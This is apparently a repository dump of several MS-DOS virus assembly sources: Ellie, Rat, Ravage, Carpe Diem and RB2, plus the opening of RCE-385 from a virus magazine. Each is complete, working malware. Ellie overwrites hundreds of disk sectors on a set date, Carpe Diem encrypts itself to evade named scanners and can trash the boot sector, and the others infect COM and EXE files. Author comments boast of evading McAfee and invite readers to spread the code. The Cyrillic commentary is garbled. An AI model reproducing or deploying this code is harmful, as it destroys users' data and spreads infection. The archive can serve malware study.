; ÄÄ-ÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; Here is the real "Ellie"..Yeah..that's certainly her!
; ÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
ELLIE: ; Here comes the bitch..
cli ; Tigh her up!
mov ah,2 ; starting with drive C
cwd ; starting at sector 0
mov cx,0100h ; write 256 sectors
int 026h ; to protect and serve..
jmp maria ; Next victim is Maria..
MARIA: ;Yet another..
MOV AL,3 ;Set to fry drive D
MOV CX,700 ;Set to write 700 sectors
MOV DX,00 ;Starting at sector 0
MOV DS,[DI+99] ;Put random crap in DS
MOV BX,[DI+55] ;More crap in BX
CALL ELLIE ;Jump for joy!...
; ÄÄ-ÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-ÄÄÄÄ-
; If you want Ellie to go off on some special month, just look at procedure
; "Infect_file", and the call to daycheck. Change the call to Monthcheck,
; and "delete" the ";" on procedure monthcheck. But remember, that makes,
; the virus much less destructive, and by that time, all scanners has
; probably added a new scan-string on this one. Now it will go off the
; 10:th every month. Feel free to modify this as much you want to.
; MONTHCHECK: ; Procudure to check
; mov ah,2ah ; what month it is..
; int 21h ; Dos to your service..
; cmp dh,06 ; comp dh,06 (July, month 06)
; je daycheck ; if month 06, jump to daycheck,
; JMP something ; if not, just jump to something..
; ÄÄ-ÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-ÄÄÄÄ-
Daycheck: ; check what day it is..
mov ah,2ah ;
int 21h ; Dos to your service..
cmp dl,10 ; If it is the 10:th,
je ellie ; if yes, have a great fuck..
JMP something ; if not..just can tell you how sorry I'm !
Something: ; Some stupid procedure..but remember..
ret ; Arbeit Macht Frei !
exit_virus:
cmp files_found,15 ; Are at least 15 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load address of the first line
int 21h ; Print it..
; mov dx,offset virus_msg2 ; ---
; int 21h ; Okey..mess(ages) 2-5 have been
; mov dx,offset virus_msg3 ; removed from the code..too bad,
; int 21h ; they were Metallica messages...
; mov dx,offset virus_msg4 ; ---
; int 21h ; Anyway, (ab)use this program, B4
; mov dx,offset virus_msg5 ; Mcafee gets a new string for this
; int 21h ; ---
jmp terminate ; Jump to terminate..
print_fake:
mov ah,09h ; Print fake error message
mov dx,offset fake_msg ; Print "fake_msg"
int 21h ; Dos to your service..
terminate: ; Get ready for quit this program
mov ah,4ch ; DOS terminate process function
int 21h ; Exit..
filler db 8 dup (90h) ; Pad out to 666 bytes
main endp
code ends
end main
; Greeting goes out to : Raver, Metal Militia, Scavenver,
; and of-cuz to Miss Perfect...ELLIE!
MSDOS/R-Index/Virus.MSDOS.Unknown.rat.asm
+127
View File
@@ -0,0 +1,127 @@
PAGE 59,132
;*************************************
;**The Rat Virus - Overwriting **
;** Non-Resident **
;** Com File Infector**
;** Author: -Ajax- **
;** This virus is 92 bytes long **
;** Because it is made in 1992 :) **
;**/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/**
;** Pass this unscannable around to **
;** Your friends,and tell em McAfee **
;** sent ya! **
;**/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/**
;** Underground Asylum-904/688.6494 **
;**"Replication Is Our Middle Name!"**
;*************************************
retf macro ret_count ; Fixup for Assembler
ifdef ret_count
db 0CAh
dw ret_count
elseif
db 0CBh
endif
endm
retn macro ret_count
ifdef ret_count
db 0C2h
dw ret_count
elseif
db 0C3h
endif
endm
movseg macro reg16, unused, Imm16 ; Fixup for Assembler
ifidn <reg16>, <bx>
db 0BBh
endif
ifidn <reg16>, <cx>
db 0B9h
endif
ifidn <reg16>, <dx>
db 0BAh
endif
ifidn <reg16>, <si>
db 0BEh
endif
ifidn <reg16>, <di>
db 0BFh
endif
ifidn <reg16>, <bp>
db 0BDh
endif
ifidn <reg16>, <sp>
db 0BCh
endif
ifidn <reg16>, <BX>
db 0BBH
endif
ifidn <reg16>, <CX>
db 0B9H
endif
ifidn <reg16>, <DX>
db 0BAH
endif
ifidn <reg16>, <SI>
db 0BEH
endif
ifidn <reg16>, <DI>
db 0BFH
endif
ifidn <reg16>, <BP>
db 0BDH
endif
ifidn <reg16>, <SP>
db 0BCH
endif
dw seg Imm16
endm
location_file equ 9Eh ; location of file in DTA
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h ; Starting of all .COM files
rat_virus proc far
start:
mov ah,4Eh ; fixup for making undetectable
mov cl,20h ;
mov dx,offset all_com_files ;
int 21h ;
;
start_infecting:
mov ax,3D01h ;
mov dx,Location_file ;
int 21h ; Open target file.
mov bx,ax
mov dx,offset ds:[100h] ; Location of file to write.
mov cl,5ch ; File size to overwrite.
mov ah,40h ;
int 21h ; Write to filename in dx
;
mov ah,3Eh ;
int 21h ;
;
mov ah,4Fh ;
int 21h ;
;
jnc start_infecting ; If more files,keep goin
mov ah,09h ;
mov dx,offset bbs_ad ; display my bbsad!
int 21h
int 20h ; get to dos.
all_com_files db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 00h ; data for all com files
; in current dir..
bbs_ad db 'Underground Asylum BBS - [904]688.6494$'
rat_virus endp
seg_a ends
end start

MSDOS/R-Index/Virus.MSDOS.Unknown.ravage.asm
+254
View File
@@ -0,0 +1,254 @@
; Virusname: Ravage
; Origin: Sweden
; Author: Metal Militia
; This virus can be found with any anti-virus program, since it's been
; around for a while now. (SCAN/TB-SCAN/F-PROT/SOLOMON, that is..)
; It's a resident .COM and .EXE infector, without any encryption or
; stealth capabilities. It infects when you execute (4bh), opens (3dh),
; extended open (6ch), and on closing (3eh). This makes it quite a good
; infector, but since it doesn't care what files it infects, most of the
; AV programs will find themselves makes it quite a good infector, but
; any program with selfchecking (95%) will find themself hit.
; I stopped with this virus since it's so totally buggy that you'll find
; it almost at once. This is the reason why i give you the source code.
; In my later resident things, there will be such things as encryption,
; stealth etc. i think..
.model tiny
.code
.radix 16
.code
EXE_ID = -42
viruslength = heap - _small
startload = 90 * 4
_small:
call relative
oldheader dw 020cdh
dw 0bh dup (0)
relative:
pop bp
push ds
push es
xor ax,ax
mov ds,ax
mov es,ax
mov di,startload
cmp word ptr ds:[di+25],di
jz exit_small
lea si,[bp-3]
mov cx,viruslength
db 2Eh
rep movsb
mov di,offset old21 + startload
mov si,21*4
push si
movsw
movsw
pop di
mov ax,offset int21 + startload
stosw
xchg ax,cx
stosw
exit_small:
pop es
pop ds
or sp,sp
jnp returnCOM
returnEXE:
mov ax,ds
add ax,10
add [bp+16],ax
add ax,[bp+0e]
mov ss,ax
mov sp,cs:[bp+10]
jmp dword ptr cs:[bp+14]
returnCOM:
mov di,100
push di
mov si,bp
movsw
movsb
ret
infect:
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
mov ax,4300h
int 21h
jnc test_it
jmp exitinfect
test_it:
test cl,1
je ok_2_open
and cl,0feh
mov ax,4301h
int 21h
jnc ok_2_open
jmp exitinfect
ok_2_open:
mov ax,3d02
int 21
xchg ax,bx
push cs
pop ds
push cs
pop es
mov ax,5700h
int 21h
push cx
push dx
mov si,offset oldheader+startload
mov ah,3f
mov cx,18
push cx
mov dx,si
int 21
cmp ax,cx
jnz go_already_infected
mov di,offset target + startload
push di
rep movsb
pop di
mov ax,4202
cwd
int 21
cmp ds:[di],'ZM'
jz infectEXE
cmp ds:[di],'MZ'
jz infectEXE
sub ax,3
mov byte ptr ds:[di],0e9
mov ds:[di+1],ax
sub ax,viruslength
cmp ds:[si-17],ax
jnz finishinfect
go_already_infected:
pop cx
jmp short already_infected
int21:
cmp ax,4b00
jz infect
cmp ax,3d00
jz infect
cmp ax,3e00
jz some_open
cmp ax,6c00
jnz not_opening
some_open:
mov ah,45
int 21
jmp infect
not_opening:
jmp chain
infectEXE:
cmp word ptr [di+10],EXE_ID
jz go_already_infected
push ax
push dx
add ax,viruslength
adc dx,0
mov cx,200
div cx
or dx,dx
jz nohiccup
inc ax
nohiccup:
mov word ptr ds:[di+4],ax
mov word ptr ds:[di+2],dx
pop dx
pop ax
mov cx,10
div cx
sub ax,ds:[di+8]
mov word ptr ds:[di+14],dx
mov word ptr ds:[di+16],ax
mov word ptr ds:[di+0e],ax
mov word ptr ds:[di+10],EXE_ID
finishinfect:
mov cx,viruslength
mov ah,40
mov dx,startload
int 21
mov ax,4200
xor cx,cx
cwd
int 21
mov ah,40
mov dx,di
pop cx
int 21
already_infected:
pop dx
pop cx
mov ax,5701h
int 21h
mov ah,3e
int 21
jmp exitinfect
db 'RAVAGE! '
db '(c) Metal Militia / Immortal Riot'
exitinfect:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
chain:
db 0ea
heap:
old21 dw ?, ?
target dw 0ch dup (?)
endheap:
end _small
MSDOS/R-Index/Virus.MSDOS.Unknown.raver.asm
+292
View File
@@ -0,0 +1,292 @@
; VirusName : CARPE DIEM! - Seize the day
; Origin : Sweden
; Author : Raver
; Date : 16/11/93
; Well this is my (Raver's) first scratch virus.
; This virus is mainly made for educational purpose (my own!).
; It's pretty well commented in an easy way so even you folks
; with little experience with assembler should be able to follow
; the code!
; It's a pretty simple non-overwriting .com-infector with a harmless
; nuking routine. It clears and restores the file attributes and
; date/time stamp and finds and infects files using the dot-dot method.
; An encryption routine and some "unusual" instructions are included to
; avoid detection by the common virus scanners. At release date, see
; above, neither F-prot nor Tb-scan found traces of virus code!
; There is about a 5 percent chance that the nuking routine will be
; activated, it checks the system time for 1/100 of a second. If it's
; activated it'll overwrite the first sector on the fixed disk (c:)
; which contains the boot sector. This might seem cruel but, infact,
; it's quite harmless 'cause norton utilities and other programs
; easily restore the boot sector. It's there just to make inexperienced
; users (lamers!) nervous!
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; CARPE DIEM! - Seize the day
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
cseg segment byte public 'code'
assume cs:cseg, ds:cseg
org 100h
start_of_virus: ;entry point
call get_off ;this somewhat unusual code won't
get_off: ;produce a flexible entry point flag
mov si,sp ;get the delta offset
mov bp,word ptr ss:[si] ;offset is on top of stack
sub bp,offset get_off ;put it in bp
inc sp ;restore sp to it's original
inc sp
; call encrypt_decrypt ;decrypt the contents of the program
mov ax,bp ;use alternative code - otherwise
add ax,116h ;f-prot will recognize it as Radyum!!!!
push ax
jmp encrypt_decrypt
jmp encrypted_code_start ;jmp to the (en/de)crypted virus area
encryption_value dw 0 ;random value for encryption routine
write_virus_to_file: ;proc to append virus code to file
call encrypt_decrypt ;encrypt the virus before write
mov cx,offset end_of_virus-100h ;length of virus to be written
lea dx,[bp] ;write from start
mov ax,word ptr [bp+end_of_virus+1ah+2] ;most significant part of
inc ah ;file length in DTA. Is
add dx,ax ;always 0 in .com-files.
mov ah,40h ;Use this trick to fool
int 21h ;heuristic searches.
;dx = delta offset+100h
call encrypt_decrypt ;decrypt the code for
ret ;further processing.
encrypt_decrypt: ;proc to (en/de)crypt the code
mov dx,word ptr [bp+encryption_value] ;use random number for every
lea si,[bp+encrypted_code_start] ;new infection
mov cx,(end_of_virus-encrypted_code_start+1)/2
crypt_loop: ;xor the whole virus code
xor word ptr [si],dx ;between encrypted_code_start
add si,2 ;and end_of_virus
loop crypt_loop
ret
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; Here the part that will be encrypted starts, i.e. all code
; except the encryption routine and the routine to append virus
; to file.
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
encrypted_code_start:
cld
mov ah,1ah ;Set DTA Transfer area to after
lea dx,[bp+end_of_virus] ;after the end of file to save file
int 21h ;size. Note: do not use default 80h
;as DTA area since the parameters to
;the "real" program will be overwritten!
lea si,[bp+orgbuf] ;Transfer buffer contents
lea di,[bp+orgbuf2] ;to be restored to the beginning
mov cx,2 ;for restart of the "real" program
rep movsw
mov di,2 ;Infection counter, 2 files every run
mov ah,19h ;get current drive
int 21h
cmp al,2 ;check if a: or b:
jae get_cur_dir ;if so, skip infection. Otherwise
jmp no_more_files ;the user will most likely get
;quite suspicious
get_cur_dir:
mov ah,47h ;get starting directory
xor dl,dl ;it will be changed by the
lea si,[bp+end_of_virus+2ch] ;dot-dot method later on
int 21h
find_first: ;start finding the first .com file
mov cx,7 ;in every new dir
lea dx,[bp+filespec]
mov ah,4eh
int 21h
jnc clear_attribs ;successive?
call ch_dir ;no more files in dir. change dir
jmp find_first ;start over again
;otherwise jmp
find_next: ;this is the upper point of the find
mov ah,4fh ;files loop in a dir
int 21h
jnc clear_attribs
call ch_dir ;no more files in dir. change dir
jmp find_first ;start over again
clear_attribs: ;set the file attribute to 0
mov ax,4301h
xor cx,cx
lea dx,[bp+end_of_virus+1eh]
int 21h
open_file: ;open file to be infected
mov ax,3d02h
; lea dx,[bp+end_of_virus+1eh] ;since clear_attribs
int 21h
xchg ax,bx ;Put file handle in bx
read_file: ;read first four bytes of file
mov ah,3fh ;They will be restore to the start
mov cx,4 ;after the virus is finnished
lea dx,[bp+orgbuf] ;so the program can execute
int 21h
check_already_infected: ;check the first to bytes and check
mov si,dx ;if the file is already infected
lea si,[bp+orgbuf]
cmp word ptr [si],0e990h
je already_infected ;if so, jmp
cmp word ptr [bp+end_of_virus+35],'DN' ;check if command.com
jz already_infected ;if so, don't infect
mov ax,word ptr [bp+end_of_virus+1ah] ;check file size
cmp ax,500 ;and skip short and
jb already_infected ;long files
cmp ax,64000
ja already_infected
mov ax,4202h ;get lenght of initial jmp in ax
xor cx,cx
xor dx,dx
int 21h
sub ax,4 ;subtract the first four bytes, which
;will be overwritten
mov word ptr [bp+startbuf],0e990h ;load the buffer with a nop
mov word ptr [bp+startbuf+2],ax ;and a jmp to virus beginning
;notice the reversed order!
mov ax,4200h ;move to beginning of file
int 21h
mov ah,40h ;write the new instructions
mov cx,4
lea dx,[bp+startbuf]
int 21h
mov ax,4202h ;move to end of file
xor cx,cx
xor dx,dx
int 21h
mov ah,2ch ;get a random number from
int 21h ;system clock for the
mov word ptr [bp+encryption_value],dx ;encryption routine
call write_virus_to_file ;append the virus code
jmp restore_time_date
already_infected: ;if already encrypted increase
inc di ;infection counter with one
restore_time_date: ;restore file time & date
lea si,[bp+end_of_virus+16h]
mov cx,word ptr [si]
mov dx,word ptr [si+2]
mov ax,5701h
int 21h
close_file: ;close the file handle
mov ah,3eh
int 21h
set_old_attrib: ;restore the old file attrib
mov ax,4301h
xor ch,ch
mov cl,byte ptr [bp+end_of_virus+15h]
lea dx,[bp+end_of_virus+1eh]
int 21h
dec di ;decrease infection counter
cmp di,0 ;and check if infection is
jbe no_more_files ;completed
jmp find_next
no_more_files:
mov ah,2ch ;get a new random number
int 21h ;5% chance of nuke
cmp dl,5
ja restore_start ;above 5 no nuke
mov ax,0301h ;trash the bootsector of c:
mov cx,0001h ;This might seem cruel but
mov dx,0080h ;norton and other programs
lea bx,[bp+start_of_virus] ;easily fix it. It's just
int 13h ;to make the user nervous!!
mov ah,09h ;deliver a message too
lea dx,[bp+signature]
int 21h
restore_start: ;copy the four saved bytes to
lea si,[bp+orgbuf2] ;beginning of file in memory
mov di,100h
movsw
movsw
restore_dir: ;change back to original
lea dx,[bp+end_of_virus+2ch] ;dir
mov ah,3bh
int 21h
exit_proc: ;return to start of program
mov bx,100h ;This will be enrypted in
push bx ;infected files, so anti-vir
;progs won't complain.
xor ax,ax ;for org virus to push on
retn ;the stack for ret
ch_dir:
lea dx,[bp+dot_dot] ;use dot-dot method
mov ah,3bh
int 21h
jnc no_err ;sub dir existed
pop ax ;otherwise all files are checked. exit!
jmp no_more_files ;pop the ip pointer from the stack
no_err: ;and jump to the end part
ret
signature db "CARPE DIEM! (c) '93 - Raver/Immortal Riot",0ah,0dh,'$'
country db " Sweden 16/11/93"
filespec db '*.com',0
dot_dot db '..',0
orgbuf db 90h,90h,50h,0c3h ;instructions to exit the
orgbuf2 db 4 dup(0) ;scratch after infection
startbuf db 4 dup(0) ;nop,nop,push ax,ret
end_of_virus:
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; The virus code ends here but the point below here (the heap)
; is used to store temporary variables such as the dta-area and
; the starting directory
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
cseg ends
end start_of_virus
MSDOS/R-Index/Virus.MSDOS.Unknown.rb2.asm
+461
View File
@@ -0,0 +1,461 @@
page 70,120
Name VIRUS
;*************************************************************************
; Program Virus Ver.: 1.1
; Copyright by R. Burger 1986
; This is a demonstration program for computer
; viruses. It has the ability to replicate itself,
; and thereby modify other programs
;*************************************************************************
Code Segment
Assume CS:Code
progr equ 100h
ORG progr
;*************************************************************************
; The three NOP's serve as the marker byte of the
; virus which will allow it to identify a virus
;*************************************************************************
MAIN:
nop
nop
nop
;*************************************************************************
; Initialize the pointers
;*************************************************************************
mov ax,00
mov es:[pointer],ax
mov es:[counter],ax
mov es:[disks],al
;*************************************************************************
; Get the selected drive
;*************************************************************************
mov ah,19h ; drive?
int 21h
;*************************************************************************
; Get the current path on the current drive
;*************************************************************************
mov cs:drive,al ; save drive
mov ah,47h ; dir?
mov ah,ah
mov si,si
mov dh,0
add al,1
mov dl,dl
nop ;****
mov dl,al
mov dl,dl
nop ;**** ; in actual drive
lea si,cs:old_path
int 21h
;*************************************************************************
; Get the number of drives present.
; If only one drive is present, the pointer for
; search order will be set to search order + 6
;*************************************************************************
mov ah,0eh ; how many disks
mov dl,0 ;****????
int 21h
mov al,01
cmp al,01 ; one drive?
jnz hups3
mov al,06
hups3: mov ah,0
lea bx,search_order
add bx,ax
add bx,0001h
mov cs:pointer,bx
clc
;*************************************************************************
; Carry is set, if no more .COM's are found.
; Then, to avoid unnecessary work, .EXE files will
; be renamed to .COM file and infected.
; This causes the error message "Program too large
; to fit in memory" when starting larger infected
; EXE programs.
;*************************************************************************
change_disk:
jnc no_name_change
mov ah,17h ; change exe to com
lea dx,cs:maske_exe
int 21h
cmp al,0ffh
jnz no_name_change ; .EXE found?
;*************************************************************************
; If neither .COM nor .EXE is found, then sectors will
; be overwritten depending on the system time in
; milliseconds. This is the time of the complete
; "infection" of a storage medium. The virus can find
; nothing more to infect and starts its destruction.
;*************************************************************************
; mov ah,2ch ; read system clock
; int 21h
; mov bx,cs:pointer
; mov al,cs:[bx]
; mov bx,dx
; nop ;****
; mov cx,2
; nop ;****
; mov dh,0
; int 26h ; write crap on disk
db ' RB2 - LiquidCode <tm> '
;*************************************************************************
; Check if the end of the search order table has been
; reached. If so, end.
;*************************************************************************
no_name_change:
mov bx,cs:pointer
dec bx
mov cs:pointer,bx
mov dl,cs:[bx]
cmp dl,0ffh
jnz hups2
jmp hops
;*************************************************************************
; Get new drive from search order table and
; select it.
;*************************************************************************
hups2:
mov ah,0eh
mov dl,2 ;***** +
int 21h ; change disk
;*************************************************************************
; Start in the root directory
;*************************************************************************
mov ah,3bh ; change path
lea dx,path
int 21h
jmp find_first_file
;*************************************************************************
; Starting from the root, search for the first subdir
; First convert all .EXE files to .COM in the old
; directory.
;*************************************************************************
find_first_subdir:
mov ah,17h ; change exe to com
lea dx,cs:maske_exe
int 21h
mov ah,3bh ; use root dir
lea dx,path
int 21h
mov ah,04eh ;Search for first subdirectory
mov cx,00010001b ; dir mask
lea dx,maske_dir
int 21h
jc change_disk
mov bx,CS:counter
INC BX
DEC bx
jz use_next_subdir
;*************************************************************************
; Search for the next subdir. If no more directories
; are found, the drive will be changed.
;*************************************************************************
find_next_subdir:
mov ah,4fh ; search for next subdir
int 21h
jc change_disk
dec bx
jnz find_next_subdir
;*************************************************************************
; Select found directory
;*************************************************************************
use_next_subdir:
mov ah,2fh ; get dta address
int 21h
add bx,1ch
mov es:[bx],'\ ' ; address of name in dta
inc bx
push ds
mov ax,es
mov ds,ax
mov dx,bx
mov ah,3bh ; change path
int 21h
pop ds
mov bx,cs:counter
inc bx
mov CS:counter,bx
;*************************************************************************
; Find first .COM file in the current directory.
; If there are non, search the next directory.
;*************************************************************************
find_first_file:
mov ah,04eh ; Search for first
mov cx,00000001b ; mask
lea dx,maske_com ;
int 21h
jc find_first_subdir
jmp check_if_ill
;*************************************************************************
; If the program is already infected, search for
; the next program.
;*************************************************************************
find_next_file:
mov ah,4fh ; search for next
int 21h
jc find_first_subdir
;*************************************************************************
; Check if already infected by the virus.
;*************************************************************************
check_if_ill:
mov ah,3dh ; open channel
mov al,02h ; read/write
mov dx,9eh ; address of name in dta
int 21h
mov bx,ax ; save channel
mov ah,3fh ; read file
mov cx,buflen ;
mov dx,buffer ; write in buffer
int 21h
mov ah,3eh ; CLOSE FILE
int 21h
;*************************************************************************
; Here we search for three NOP's.
; If present, there is already an infection. We must
; then continue the search.
;*************************************************************************
mov bx,cs:[buffer]
cmp bx,9090h
jz find_next_file
;*************************************************************************
; Bypass MS-DOS write protection if present
;*************************************************************************
mov ah,43h ; write enable
mov al,0
mov dx,9eh ; address of name in dta
int 21h
mov ah,43h
mov al,01h
and cx,11111110b
int 21h
;*************************************************************************
; Open file for write access.
;*************************************************************************
mov ah,3dh ; open channel
mov al,02h ; read/write
mov dx,9eh ; address of name in dta
int 21h
;*************************************************************************
; Read date entry of program and save for future use.
;*************************************************************************
mov bx,ax ; channel
mov ah,57h ; get date
mov al,0
int 21h
push cx ; save date
push dx
;*************************************************************************
; The jump located at address 0100h of the program
; will be saved for future use.
;*************************************************************************
mov dx,cs:[conta] ; save old jmp
mov cs:[jmpbuf],dx
mov dx,cs:[buffer+1] ; save new jump
lea cx,cont-100h
sub dx,cx
mov cs:[conta],dx
;*************************************************************************
; The virus copies itself to the start of the file
;*************************************************************************
mov ah,40h ; write virus
mov cx,buflen ; length buffer
lea dx,main ; write virus
int 21h
;*************************************************************************
; Enter the old creation date of the file.
;*************************************************************************
mov ah,57h ; write date
mov al,1
pop dx
pop cx ; restore date
int 21h
;*************************************************************************
; Close the file.
;*************************************************************************
mov ah,3eh ; close file
int 21h
;*************************************************************************
; restore the old jump address.
; The virus saves at address "conta' the jump which
; was at the start of the host program.
; This is done to preserve the executability of the
; host program as much as possible.
; After saving itstill works with the jump address
; contained in the virus. The jump address in the
; virus differs from the jump address in memory
;
;*************************************************************************
mov dx,cs:[jmpbuf] ; restore old jmp
mov cs:[conta],dx
hops: nop
call use_old
;*************************************************************************
; Continue with the host program.
;*************************************************************************
cont db 0e9h ; make jump
conta dw 0
mov ah,00
int 21h
;*************************************************************************
; reactivate the selected drive at the start of the
; program.
;*************************************************************************
use_old:
mov ah,0eh ; use old drive
mov dl,cs:drive
int 21h
;*************************************************************************
; Reactivate the selected path at the start of the
; program.
;*************************************************************************
mov ah,3bh ; use old dir
lea dx,old_path-1 ; get old path and backslash
int 21h
ret
search_order db 0ffh,1,0,2,3,0ffh,00,0ffh
pointer dw 0000 ; pointer f. search order
counter dw 0000 ; counter f. nth search
disks db 0 ; number of disks
maske_com db "*.com",00 ; search for com files
maske_dir db "*",00 ; search dir's
maske_exe db 0ffh,0,0,0,0,0,00111111b
db 0,"????????exe",0,0,0,0
db 0,"????????com",0
maske_all db 0ffh,0,0,0,0,0,00111111b
db 0,"???????????",0,0,0,0
db 0,"????????com",0
buffer equ 0e000h ; a safe place
buflen equ 230h ; length of virus !!!!!!
; careful
; if changing !!!!!!
jmpbuf equ buffer+buflen ; a safe place for jump
path db "\",0 ; first path
drive db 0 ; actual drive
back_slash db "\"
old_path db 32 dup(?) ; old path
code ends
end main
;*************************************************************************
; WHAT THE PROGRAM DOES:
;
; When the program is started, the first COM file in the root
; directory is infected. You can't see any changes to the
; directory entries. But if you look at the hex dump of an
; infected program, you can see the marker, which in this case
; consists of three NOP's (hex 90). WHen the infected program
; is started, the virus will first replicate itself, and then
; try to run the host program. It may run or it may not, but
; it will infect another program. This continues until all
; the COM files are infected. The next time it is run, all
; of the EXE files are changed to COM files so that they can
; be infected. In addition, the manipulation task of the virus
; begins, which consists of the random destruction of disk
; sectors.
;*************************************************************************

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/R-Index/Virus.MSDOS.Unknown.rce.asm
+391
View File
@@ -0,0 +1,391 @@
;ÛßßßßßßßßßßßßßßßÛ ß ß ÛÛßÛÛßÛÛ
;Û STEALTH group Û° Û ÛßÜ Ûßß Üßß Üßß ßÛß Üßß ÛßÛ Ý Û ÜßÛ Û Üßß Üßß ÛÛ ßß ÛÛ
;Û presents Û° Û Û Û Ûß Ûß Û Û Ûß Û Û Û Û Û Û Û Û ßÛßß ÛÛÛÛÛ ÛÛ
;ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ° Þ Þ Þ Þ ÞÜÜ ÞÜÜ Þ ÞÜÜ ÞÜß ßÛ ßÜÛ Þ ÞÜÜ ÞÜÜ ÛÛÛÛÛÜÛÛ
; °°°°°°°°°°°°°°°°° JAN 1995
;
; INFECTED VOICE. Issue 4. January 1995. (C) STEALTH group, Kiev 148, Box 10.
; THE FIRST UNIQUE VIRUS MAGAZINE IN FORMER U.S.S.R.!!!
;
;--- RCE-385 (!).-------------------------------------------------------------
; ª¨¥ ®¤­ ª® ¢à¥¬¥­  ¯®è«¨ - ®¡ì«áï ­¥ª¨© ¤ï¤î誠 Œ®á⮢®© ¨ ­ ¯¨á « ᢮©
;ç¥à⮢᪨ ¤®â®è­ë© AdInf -> ­ã ¨ çâ® ¦¥ ⥯¥àì?Œ-¤ ,⥯¥àì ᨤ¨¬ ¬ë â¥å­®ªàëáë
;¨ á⥭ ¥¬ ¯® ⥬ ¤®¡àë¬ ¢à¥¬¥­ ¬,ª®£¤  ã î§¥à  æ¥«ë© §®®¯ àª ­  ¬ è¨­¥ ¡¥£ «,
;  ®­ - ¡« ¦¥­ ¢ ­¥¢¥¤¥­¨¨,á«î­®î ¡à맦 ,¤®ª §ë¢ «,çâ® ­¥âã â ª¨å §¢¥à¥© ¢ RAM¥.
; € ⥯¥àì ¯®­ áâ ¢¨«¨ ¯à¨¬®ç¥ª ¢á直å - çãâì çâ®,áࠧ㠧 ¢®¯ïâ!„ ¦¥ á⥫§ë
;¯à¨§ ¤ã¬ «¨áì : "€ 祣® íâ® ¬ë ᤥáì ⥫  ᢮¨ ᮪à뢠¥¬,¯àïç áì ª ª *beep ¢
;*beep".ˆ á â¥å ¯®à ¯®è¥« à §« ¤ ¢ á।¥ ‚¨à¬ ª®¢.Šâ® ¯à¥¤« £ ¥â àë«® ¢ § é¨é¥­-
;­ë© ०¨¬ áã­ãâì ¨ ⥬ á ¬ë¬ ¯®¤£«ï¤ë¢ ­¨¥ ¯à¨á¥çì,  ªâ® ¯® ¤®¡à®â¥ ¤ã襢­®©
